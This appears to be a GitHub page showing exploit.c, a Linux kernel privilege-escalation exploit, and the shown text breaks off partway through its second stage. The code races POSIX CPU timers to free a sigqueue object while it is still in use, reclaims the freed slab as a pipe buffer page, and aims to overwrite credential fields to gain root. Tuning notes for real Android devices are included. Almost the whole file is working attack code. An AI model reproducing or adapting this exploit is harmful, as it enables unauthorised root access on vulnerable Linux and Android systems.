-
Notifications
You must be signed in to change notification settings - Fork 45
Expand file tree
/
Copy pathexploit.c
More file actions
1474 lines (1248 loc) · 63.1 KB
/
exploit.c
File metadata and controls
1474 lines (1248 loc) · 63.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>
#include <sys/signalfd.h>
#include <poll.h>
#include <errno.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/mman.h>
#include <linux/futex.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
// Evaluate the syscall-style expression `x` exactly once. If the result equals
// -1 (converted to the expression's own type), print "SYSCHK(<expr>)" together
// with the current errno description via err(3) and exit with status 1.
// Otherwise the macro yields the result, so it can be used inside a larger
// expression, e.g. `int fd = SYSCHK(open(...));`.
//
// Uses `__typeof__` rather than plain `typeof` so the macro also compiles in
// strict ISO language modes, and a temporary name that is not reserved for the
// implementation.
#define SYSCHK(x) ({ \
    __typeof__(x) syschk_res_ = (x); \
    if (syschk_res_ == (__typeof__(x))-1) \
        err(1, "SYSCHK(" #x ")"); \
    syschk_res_; \
})
// Size of one page in bytes. read_pipe()/write_pipe() use it as the upper bound
// for a single transfer, and the scratch buffer in second_stage_exploit() is
// exactly this large.
#define PAGE_SIZE 0x1000uLL
// For winning the races and extending
// the race windows
// Number of getpid() calls timed by getpid_cpu_usage().
#define NUM_SAMPLES 100000
// Number of entries in `stall_timers`.
#define NUM_TIMERS 18
// Nanoseconds per millisecond.
#define ONE_MS_NS 1000000uLL
// NOTE(review): not referenced in the visible part of this file; presumably the
// upper bound for `syscall_loop_times` - confirm against main().
#define SYSCALL_LOOP_TIMES_MAX 300
// NOTE(review): not referenced in the visible part of this file.
#define EPOLL_COUNT 500
// Number of entries in `sigusr1_sfds` and `sigusr2_sfds`.
#define SFD_DUP_COUNT 100
// For synchronization between parent and child
// (single-byte status messages exchanged over the parent/child pipes).
#define SUCCESS_CHAR 's'
#define FAIL_CHAR 'f'
#define SUCCESS_STR "s"
#define FAIL_STR "f"
// The following variables are target dependent. Some benchmarking can
// be done from userland beforehand so that these variables aren't
// needed, but just for this exploit, I manually set them to values
// that work for me. You'll have to figure them out yourself.
#define PARENT_SETTIME_DELAY_US 22000
#define PARENT_SETTIME_DELAY_US_DELTA 50
// Extra getpid() iterations added to the busy loop in race_func().
#define CPU_USAGE_THRESHOLD 22000
/* Global variables for exploit setup START */
// Thread synchronization in child process
pthread_barrier_t barrier;
// Timers used to stall `handle_posix_cpu_timers()` to extend the race window
timer_t stall_timers[NUM_TIMERS];
// Thread that will trigger the timer handling, and also the thread that will
// be reaped by the exploit parent process
pthread_t race_thread;
// Pipes between the exploit child and the exploit parent, created with pipe()
// in main(). Index 0 is the read end, index 1 is the write end.
int exploit_child_to_parent[2];
int exploit_parent_to_child[2];
int sigusr1_sfds[SFD_DUP_COUNT]; // signalfd for increasing race window
int sigusr2_sfds[SFD_DUP_COUNT]; // signalfd for detecting the UAF later.
// Number of iterations to subtract from the `getpid()` busy loop in
// race_func(), i.e. how much LESS CPU time to waste on this attempt.
int syscall_loop_times = 0;
int race_retry_count = 0; // For debugging purposes
pid_t exploit_child_pid, exploit_parent_pid;
// BIG NOTE: The very first timer created by a process actually gets timer ID 0,
// so checking for NULL here is not good enough to figure out whether a timer was
// allocated or not.
//
// Instead, set these to -1, and check for -1 later.
timer_t uaf_timer = (void *) -1, realloc_timer = (void *) -1; // The UAF timer handles
/* Global variables for exploit setup END */
/* Global variables for cross-cache START */
// `sigqueue_cachep` related constants.
// NOTE(review): these values are target dependent (kernel build / slab
// configuration); they are hard-coded here rather than derived at run time.
#define SIGQUEUE_objs_per_slab 51
#define SIGQUEUE_cpu_partial 30
#define SIGQUEUE_slab_count 33
#define SIGQUEUE_obj_size 80
// `struct sigqueue` related constants.
// The *_offset values are byte offsets into one sigqueue object, as used when
// second_stage_exploit() reads and writes the object through the pipe buffer.
#define SIGQUEUE_PREALLOC 1
#define SIGQUEUE_list_next_offset 0
#define SIGQUEUE_list_prev_offset 8
#define SIGQUEUE_info_si_signo_offset (24+0)
#define SIGQUEUE_flags_offset 16
#define SIGQUEUE_user_offset 72
// `cred_jar` and `struct cred` related constants.
// `CRED_JAR_slab_size` is used in second_stage_exploit() as the byte offset of
// the second cred object within its page.
// NOTE(review): `CRED_JAR_egid_offset` is not referenced in the visible part of
// this file.
#define CRED_JAR_slab_size 192
#define CRED_JAR_euid_offset 20
#define CRED_JAR_egid_offset 24
// This list holds the timers used for cross-caching (both times).
// Indexed as [slab][object within slab].
timer_t cross_cache_timers[SIGQUEUE_slab_count][SIGQUEUE_objs_per_slab];
/* Global variables for cross-cache END */
/* Global variables for second stage START */
#define NUM_CRED_PROCS 1000 // Number of processes to spray `struct cred` objects with
int parent_owns_uaf_sigqueue = 0; // Does the parent or child have the UAF sigqueue?
pid_t buggy_pid = 0; // Parent / child process PID based on above
/* Global variables for second stage END */
// Restrict the calling thread to run only on CPU number `i`.
//
// The return value of sched_setaffinity() is not inspected, so a failed
// request goes unnoticed by the caller.
void pin_on_cpu(int i) {
    cpu_set_t only_cpu;

    CPU_ZERO(&only_cpu);
    CPU_SET(i, &only_cpu);

    // pid 0 means "the calling thread".
    sched_setaffinity(0, sizeof only_cpu, &only_cpu);
}
// Convert a `struct timespec` into a single nanosecond count.
//
// @param ts  timespec to convert; must not be NULL.
// @return    tv_sec * 1e9 + tv_nsec as a signed 64-bit value.
static inline long long ts_to_ns(const struct timespec *ts) {
    const long long ns_per_sec = 1000000000LL;
    long long whole_seconds_ns = (long long)ts->tv_sec * ns_per_sec;

    return whole_seconds_ns + (long long)ts->tv_nsec;
}
// Helper function to fully drain a signalfd.
//
// Repeatedly reads one `struct signalfd_siginfo` from `sfd` and discards it.
//
// @param sfd  signalfd descriptor. It is expected to be non-blocking
//             (SFD_NONBLOCK); on a blocking descriptor the final read() would
//             block instead of failing with EAGAIN.
// @return     number of read() calls that returned data.
//
// Termination: EINTR is retried; EAGAIN (nothing left), end-of-file and every
// other read() error end the loop. Previously a return value of 0 or an
// unexpected errno (for example EBADF on a closed descriptor) made the loop
// spin forever.
//
// NOTE: the original author flagged this helper as unreviewed generated code.
int drain_signalfd(int sfd) {
    int sig_count = 0;
    for (;;) {
        struct signalfd_siginfo si;
        ssize_t n = read(sfd, &si, sizeof(si));
        if (n > 0) {
            // Drained one record; keep going.
            sig_count++;
            continue;
        }
        if (n == -1 && errno == EINTR) {
            // Interrupted before any data was read; retry.
            continue;
        }
        // EAGAIN (fully drained), EOF, or an unrecoverable error.
        break;
    }
    return sig_count;
}
// Read the CPU timestamp counter at the START of a measured region.
//
// On the non-ARM64 path this issues `mfence`, then `rdtsc`, then `lfence`, and
// returns the 64-bit counter assembled from EDX:EAX.
//
// The inline assembly is spelled `__asm__ __volatile__` so the function also
// compiles in strict ISO language modes, where plain `asm` is not a keyword.
//
// NOTE(review): the ARM64 branch calls `rdtsc()`, which is not defined in the
// visible part of this file - presumably supplied elsewhere; confirm.
static inline size_t rdtsc_begin(void)
{
#if defined(ARM64)
    return rdtsc();
#else
    size_t a, d;
    __asm__ __volatile__ ("mfence");
    __asm__ __volatile__ ("rdtsc" : "=a" (a), "=d" (d));
    a = (d<<32) | a;
    __asm__ __volatile__ ("lfence");
    return a;
#endif
}
// Read the CPU timestamp counter at the END of a measured region.
//
// On the non-ARM64 path this issues `lfence`, then `rdtsc`, then `mfence`
// (the mirror image of rdtsc_begin()), and returns the 64-bit counter
// assembled from EDX:EAX.
//
// The inline assembly is spelled `__asm__ __volatile__` so the function also
// compiles in strict ISO language modes, where plain `asm` is not a keyword.
//
// NOTE(review): the ARM64 branch calls `rdtsc()`, which is not defined in the
// visible part of this file - presumably supplied elsewhere; confirm.
static inline size_t rdtsc_end(void)
{
#if defined(ARM64)
    return rdtsc();
#else
    size_t a, d;
    __asm__ __volatile__ ("lfence");
    __asm__ __volatile__ ("rdtsc" : "=a" (a), "=d" (d));
    a = (d<<32) | a;
    __asm__ __volatile__ ("mfence");
    return a;
#endif
}
// This function measures the average cost of one raw `getpid()` syscall.
//
// It times NUM_SAMPLES back-to-back syscalls with rdtsc_begin()/rdtsc_end(),
// storing every start/end pair first and summing the differences afterwards.
//
// @return  the truncated integer average of (end - start) over all samples,
//          in the units returned by rdtsc_begin()/rdtsc_end().
//
// The running total is a `size_t` and can overflow if `NUM_SAMPLES` is too
// high, but with simple syscalls this works just fine.
//
// Can also actually return 0 if some weird scheduler behavior occurs and causes
// the total to overflow, so ensure to check for that when calling it.
//
// Exits through err(3) if the sample buffer cannot be allocated (previously the
// NULL pointer would have been dereferenced).
//
// Also, very important to be pinned to one CPU before running this!
long int getpid_cpu_usage() {
    size_t (*times)[2] = malloc(NUM_SAMPLES * sizeof *times);
    if (times == NULL)
        err(1, "getpid_cpu_usage: malloc");

    // Sampling loop: nothing but the timestamp reads and the syscall.
    for (int i = 0; i < NUM_SAMPLES; i++) {
        times[i][0] = rdtsc_begin();
        syscall(__NR_getpid);
        times[i][1] = rdtsc_end();
    }

    size_t total_ticks = 0;
    for (int i = 0; i < NUM_SAMPLES; i++) {
        total_ticks += times[i][1] - times[i][0];
    }
    free(times);

    return total_ticks / NUM_SAMPLES;
}
// Helper function to read from the reallocated pipe buffer data page.
//
// Consumes `offset` bytes from the pipe (they are read into `buf` and then
// overwritten), then reads up to `size` bytes into the start of `buf`.
//
// @param pfds    pipe descriptor pair; only the read end `pfds[0]` is used.
// @param size    maximum number of payload bytes to read, at most PAGE_SIZE.
// @param offset  number of leading bytes to skip, at most PAGE_SIZE.
// @param buf     destination buffer.
//
// The skip read must return exactly `offset` bytes. The payload read is only
// checked for failure, not for length, so it may return fewer than `size`
// bytes; callers in this file rely on that to empty the pipe with
// `read_pipe(pfds, PAGE_SIZE, 0, buf)`.
//
// Any violation or failed read(2) terminates the process through SYSCHK.
//
// NOTES:
// - `buf` is assumed to be at least PAGE_SIZE bytes large, which is why
//   `offset` is bounded as well as `size`.
// - The pipe is assumed to be readable (i.e write_pipe() was
//   already called before this).
void read_pipe(int pfds[2], size_t size, size_t offset, char *buf) {
    size_t ret = 0;
    if (size > PAGE_SIZE) {
        printf("read_pipe: size too big\n");
        SYSCHK(-1);
    }
    // The skip read below writes `offset` bytes into `buf`.
    if (offset > PAGE_SIZE) {
        printf("read_pipe: offset too big\n");
        SYSCHK(-1);
    }
    // Read up to offset first, then read size bytes
    ret = SYSCHK(read(pfds[0], buf, offset));
    if (ret != offset) {
        printf("read_pipe: offset read failed, offset %zu read %zu\n", offset, ret);
        SYSCHK(-1);
    }
    SYSCHK(read(pfds[0], buf, size));
}
// Helper function to write to the reallocated pipe buffer data page.
//
// Writes `offset` zero bytes into the pipe, followed by `size` bytes taken
// from the start of `buf`, so that the payload ends up `offset` bytes after
// the point where this call started writing.
//
// @param pfds    pipe descriptor pair; only the write end `pfds[1]` is used.
// @param size    number of payload bytes to write, at most PAGE_SIZE.
// @param offset  number of zero bytes written before the payload, at most
//                PAGE_SIZE.
// @param buf     source buffer holding the payload.
//
// Both writes must complete in full; a short write, a failed write(2) or an
// out-of-range argument terminates the process through SYSCHK.
//
// NOTES:
// - `buf` is assumed to be at least PAGE_SIZE bytes large.
// - This will clobber all data before offset.
void write_pipe(int pfds[2], size_t size, size_t offset, void *buf) {
    size_t ret = 0;
    if (size > PAGE_SIZE) {
        printf("write_pipe: size too big\n");
        SYSCHK(-1);
    }
    if (offset > PAGE_SIZE) {
        printf("write_pipe: offset too big\n");
        SYSCHK(-1);
    }
    // Fixed-size zero padding. The previous `char zero_buf[offset]` was a
    // zero-length variable-length array (undefined behavior) whenever `offset`
    // was 0, and an unbounded stack allocation otherwise.
    char zero_buf[PAGE_SIZE] = {0};
    // Write up to offset first, then write the data
    ret = SYSCHK(write(pfds[1], zero_buf, offset));
    if (ret != offset) {
        printf("write_pipe: offset write failed, offset %zu wrote %zu\n", offset, ret);
        SYSCHK(-1);
    }
    ret = SYSCHK(write(pfds[1], buf, size));
    if (ret != size) {
        printf("write_pipe: size write failed, size %zu wrote %zu\n", size, ret);
        SYSCHK(-1);
    }
}
// This function pre-allocates sigqueues very carefully for cross-caching (both times).
//
// It creates SIGEV_NONE timers on CLOCK_THREAD_CPUTIME_ID and stores their IDs
// in `cross_cache_timers`: every slot of rows 0 and 1, then slots 0..24 of
// row 2. Any failing timer_create() terminates the process through SYSCHK.
//
// The creation order is deliberate; do not reorder the loops.
//
// NOTE: Ensure you are on the correct CPU before calling this function!
void sigqueue_crosscache_preallocs() {
// ---------------------------------------------------------------------------------
//
// NOTE: On a real android device, a bunch of sigqueues should be allocated first
// so that all slab pages from per cpu partial lists, per node partial lists, etc
// are used up. This can be done by just spamming real-time signals to some process
// that's blocking them.
//
// I won't be doing that here, just going to assume this is being ran in QEMU on a
// clean setup where the sigqueue cache's slab pages will not be on any per-cpu
// or per-node partial lists.
//
// ---------------------------------------------------------------------------------
//
// Goal: get our UAF timer in the middle of slab 3.
struct sigevent cross_cache_evt = {0};
cross_cache_evt.sigev_notify = SIGEV_NONE;
// Allocate full slabs 1 and 2.
// (Rows 0 and 1 of `cross_cache_timers`; the comments count slabs from 1.)
for (int i = 0; i < 2; i++) {
for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j]));
}
}
// Allocate 25 objects in slab 3
for (int i = 0; i < 25; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i]));
}
// Next allocation will be the sigqueue whose slab will be cross-cached.
}
// This function post-allocates sigqueues very carefully for cross-caching (both times).
//
// It continues where sigqueue_crosscache_preallocs() stopped: slot 25 of row 2
// first, then slots 26..50 of row 2, then every slot of rows 3 up to
// SIGQUEUE_slab_count-1. Any failing timer_create() terminates the process
// through SYSCHK.
//
// NOTE: Ensure you are on the correct CPU before calling this function!
void sigqueue_crosscache_postallocs() {
struct sigevent cross_cache_evt = {0};
cross_cache_evt.sigev_notify = SIGEV_NONE;
// We have a freed sigqueue at the head of the freelist of slab 3 right now. Re-allocate
// it plus the remaining 25 objects in that slab now.
//
// You can use this special value with a kernel patch to figure out where it's allocated.
// This should reallocate on top of whatever sigqueue we are attempting to cross-cache. If
// it doesn't, there's a bug in this exploit!
// cross_cache_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL;
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][25]));
cross_cache_evt.sigev_value.sival_ptr = (void *)0; // reset if it was set
// Allocate the remaining 25 objects in slab 3.
for (int i = 26; i < SIGQUEUE_objs_per_slab; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i]));
}
// Allocate sigqueues for the remaining slabs.
for (int i = 3; i < SIGQUEUE_slab_count; i++) {
for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j]));
}
}
}
// This function frees the slab 3 page back to the page allocator by very
// carefully freeing sigqueues in the `cross_cache_timers` list.
//
// It deletes a fixed selection of the timers recorded in `cross_cache_timers`,
// in a fixed order. Every timer_delete() is checked with SYSCHK, so all of the
// selected timers must still exist when this is called.
//
// The comments below count slabs and objects from 1; the array indices count
// from 0.
void free_crosscache_sigqueues() {
// Now, the target sigqueue should be in the middle of slab 3.
//
// Strategically free sigqueues to fill up the per-cpu partial list, but also
// ensure that the target sigqueue's slab is fully freed before freeing the 32nd slab.
//
// Start by freeing the first and last object in slab 1.
SYSCHK(timer_delete(cross_cache_timers[0][0]));
SYSCHK(timer_delete(cross_cache_timers[0][SIGQUEUE_objs_per_slab-1]));
// Now, free the first, and then objects 26 through 51 in slab 2.
SYSCHK(timer_delete(cross_cache_timers[1][0]));
for (int i = 25; i < SIGQUEUE_objs_per_slab; i++) {
SYSCHK(timer_delete(cross_cache_timers[1][i]));
}
// Free all objects in slab 3
for (int i = 0; i < SIGQUEUE_objs_per_slab; i++) {
SYSCHK(timer_delete(cross_cache_timers[2][i]));
}
// Free objects 1 through 25 in slab 4
for (int i = 0; i < 25; i++) {
SYSCHK(timer_delete(cross_cache_timers[3][i]));
}
// For the remaining slabs up to `cpu_partial` (inclusive), free the first and last obj
for (int i = 4; i < SIGQUEUE_cpu_partial+1; i++) {
SYSCHK(timer_delete(cross_cache_timers[i][0]));
SYSCHK(timer_delete(cross_cache_timers[i][SIGQUEUE_objs_per_slab-1]));
}
// Now, freeing one object from the `cpu_partial+1`th slab should trigger
// `unfreeze_partials()`, which will move fully freed slabs (i.e slab 3) to
// the page allocator.
//
// Free first and last sigqueue here just in case the first one is in the
// slab overlapped with the previous index.
SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][0]));
SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][SIGQUEUE_objs_per_slab-1]));
}
void cleanup_crosscache_sigqueues() {
// In this case, we can just timer_delete() every single timer without
// checking for errors. If they exist, they will be deleted. Otherwise,
// we'll see an error.
for (int i = 0; i < SIGQUEUE_slab_count; i++) {
for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
timer_delete(cross_cache_timers[i][j]);
}
}
}
// This is the function responsible for triggering `handle_posix_cpu_timers()`.
//
// Sequence, as implemented below:
//   1. Pin to CPU 3 and send this thread's TID over `exploit_child_to_parent`.
//   2. Calibrate with getpid_cpu_usage() (retrying while it returns 0).
//   3. After barrier 1, create `uaf_timer` while still on CPU 3, then move to
//      CPU 2 and create the NUM_TIMERS stall timers.
//   4. After barriers 2 and 3, burn CPU time with getpid() calls and return.
//
// Reads the globals `barrier`, `syscall_loop_times` and
// `exploit_child_to_parent`; writes `uaf_timer` and `stall_timers`.
void race_func(void) {
// Pin to same CPU as the `free_func()` thread. This is the first cross-cache
// CPU.
pin_on_cpu(3);
// For the race condition trigger
struct sigevent race_evt = {0};
race_evt.sigev_notify = SIGEV_SIGNAL;
race_evt.sigev_signo = SIGUSR1;
// For the UAF timer
struct sigevent uaf_evt = {0};
uaf_evt.sigev_notify = SIGEV_SIGNAL;
uaf_evt.sigev_signo = SIGUSR1; // SIGUSR1 for now
// uaf_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // Detect this UAF timer
prctl(PR_SET_NAME, "RACER");
// prctl(PR_SET_NAME, "REAPEE"); // KERNEL PATCH: 500ms delay with this
// Send this thread's TID to the parent process, so the parent can attach to us.
pid_t tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(exploit_child_to_parent[1], &tid, sizeof(pid_t))); // sync 1
// Get the average CPU time usage of the `getpid()` syscall, so we
// can use it for the trigger later
long int getpid_avg = 0;
// `getpid_cpu_usage()` can technically return 0, it's very rare but
// if it does, just recalculate.
// (A zero here would also be a division by zero in the busy loop below.)
while (getpid_avg == 0) {
getpid_avg = getpid_cpu_usage();
}
// Wait for parent to attach and continue us.
pthread_barrier_wait(&barrier); // barrier 1
// Create the UAF timer on the first cross-cache CPU.
//
// NOTE: This must be the last timer created on this CPU's active slab! Because we will
// free it and re-allocate over it in `free_func()`.
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &uaf_evt, &uaf_timer));
// Switch the pinned CPU after creating the UAF timer. This is important because
// `free_func()` must be able to run concurrently to this, and we also don't want to
// touch the active CPU slab of the cross-cache CPU!
pin_on_cpu(2);
// Create the remaining stall timers for extending the race window
for (int i = 0; i < NUM_TIMERS; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &race_evt, &stall_timers[i]));
}
// Wait for the main thread to arm the timers. This is to make sure
// this thread does not use CPU time to arm the timers.
pthread_barrier_wait(&barrier); // barrier 2 - wake up main thread
pthread_barrier_wait(&barrier); // barrier 3 - wait for armed timers
// Waste just the right amount of CPU time now without firing any of the timers.
//
// The logic here is that calling `getpid()` enough times to consume 1 ms of CPU time,
// and then adding a threshold amount of times on top of that will ensure that the timers
// fire BEFORE `do_exit()` is called.
//
// Then, subtract `syscall_loop_times` (which changes on each retry) to slowly reduce the
// amount of CPU time being consumed, until the timers fire right after `exit_notify()` wakes
// up the parent exploit process.
//
// Use a print statement in `free_func()` when it receives SIGUSR1 to figure out how often
// the timers are firing, and adjust CPU_USAGE_THRESHOLD accordingly so that it fires sometimes,
// but not every time.
//
// NOTE(review): ONE_MS_NS is unsigned long long, so the whole bound (and the
// comparison with `i`) is evaluated as unsigned long long.
for (int i = 0; i < ((ONE_MS_NS / getpid_avg) + CPU_USAGE_THRESHOLD - syscall_loop_times); i++) {
syscall(__NR_getpid);
}
// This `return` will trigger `do_exit()` in the kernel. The goal is for a scheduler interrupt
// to occur and `handle_posix_cpu_timers()` to run after `exit_notify()` wakes up the parent
// exploit process that called `waitpid()` on us.
return;
}
// Companion to race_func(): waits for SIGUSR1 to become readable on
// `sigusr1_sfds[0]`, then deletes `uaf_timer`, moves to CPU 0, reports success
// to the parent over `exploit_child_to_parent`, and waits on barrier 4.
//
// Returns after the first successful detection, or after an unexpected poll()
// error (in which case it prints the error and waits for a key press first).
void free_func(void) {
pin_on_cpu(3);
prctl(PR_SET_NAME, "FREE_FUNC");
// Set up a poll for SIGUSR1. As soon as we receive it, we know
// we're in the race window.
struct pollfd pfd = {
.fd = sigusr1_sfds[0],
.events = POLLIN
};
// Poll for SIGUSR1.
// The timeout is 0, so poll() returns immediately and this loop busy-polls.
for (;;) {
int ret = poll(&pfd, 1, 0);
// Got SIGUSR1 from the first stall timer, in race window now.
if (pfd.revents & POLLIN) {
// Free the UAF timer now on CPU 3 (first cross-cache CPU).
SYSCHK(timer_delete(uaf_timer));
// Immediately switch pinned CPU to 0 and wake up the parent exploit process.
//
// Parent exploit process will already have switched to CPU 3, so it can wake
// up immediately and re-allocate the UAF timer.
//
// Important to reallocate in the parent process, so that the sighand locks are
// different.
pin_on_cpu(0);
SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 4.SUCCESS
// Use the barrier to let the child process continue now and handle
// the SIGUSR1 signals.
pthread_barrier_wait(&barrier); // barrier 4
break;
}
// poll() was interrupted by a signal before anything became ready; retry.
if (ret < 0 && errno == EINTR)
continue;
// Some unknown error occurred, pause to debug
if (ret < 0) {
perror("free_func poll");
getchar();
break;
}
}
}
// Stage 2 starts after:
//
// 1. The UAF sigqueue is freed.
// 2. We still have a handle to it in either the parent's or the child's pending list.
// 3. The UAF sigqueue's pointers should point back to itself, making it
// non-dequeueable by default.
//
// This function runs stages 2 through 4 as labelled by its own progress
// messages. It reads the globals `parent_owns_uaf_sigqueue`, `buggy_pid`,
// `exploit_parent_to_child` and `exploit_child_to_parent`. Whenever
// `parent_owns_uaf_sigqueue` is 0, each signal dequeue is delegated to the
// child through a one-byte write followed by a one-byte read on those pipes.
//
// Almost every system call is wrapped in SYSCHK, so a failure terminates the
// process. The statement order and the CPU pinning between steps are
// deliberate; do not reorder.
void second_stage_exploit() {
struct signalfd_siginfo si;
char m;
// Create signalfds for all three signals we need to dequeue later.
sigset_t mask;
sigemptyset(&mask);
sigaddset(&mask, SIGUSR2); // signal used by UAF sigqueue
int sigusr2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
sigemptyset(&mask);
sigaddset(&mask, SIGRTMIN+1); // signal used by other sigqueue
int sigrt1_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
sigemptyset(&mask);
sigaddset(&mask, SIGRTMIN+2); // signal used for leaking task pending list addr
int sigrt2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
// Prepare the buffer used by the reallocated pipe buffer data page.
char buf[PAGE_SIZE];
memset(buf, 0, PAGE_SIZE);
// Just double confirm we are pinned to the right cross-cache CPU.
pin_on_cpu(3);
printf("\n[+] Stage 2 - Cross-cache the UAF sigqueue's slab\n");
// Allocate the rest of the sigqueues for cross-cache
sigqueue_crosscache_postallocs();
// Allocate a pipe for the pipe buffer data page later, and make it
// non-blocking for error checking too.
int realloc_pipefds[2];
SYSCHK(pipe(realloc_pipefds));
// Read end non-blocking
// NOTE(review): the F_GETFL results are not checked before being reused.
int flags = fcntl(realloc_pipefds[0], F_GETFL, 0);
SYSCHK(fcntl(realloc_pipefds[0], F_SETFL, flags | O_NONBLOCK));
// Write end non-blocking
flags = fcntl(realloc_pipefds[1], F_GETFL, 0);
SYSCHK(fcntl(realloc_pipefds[1], F_SETFL, flags | O_NONBLOCK));
// Now free the UAF sigqueue's page back to the page allocator.
free_crosscache_sigqueues();
// Realloc UAF sigqueue as a pipe buffer page immediately after it's freed.
// This is done by writing to the pipe.
SYSCHK(write(realloc_pipefds[1], buf, PAGE_SIZE));
printf("\t[+] Reallocated UAF sigqueue slab as a pipe buffer data page\n");
printf("\t[+] Cleaning up all cross-cache allocations to prepare for next cross-cache\n");
// We will be cross-caching again very soon, so free all other cross-cache sigqueues.
// NOTE: do this on the same CPU as the first cross-cache.
cleanup_crosscache_sigqueues();
printf("\t[+] Preparing task pending list for heap leaks\n");
// Switch CPUs to start on a clean slate for the second cross-cache.
pin_on_cpu(2);
// Do the preallocs same as before.
sigqueue_crosscache_preallocs();
// Send a new signal to the process to fill in the UAF sigqueue's next pointer
// Use `tkill()` as that uses the task's pending list. `kill()` uses the
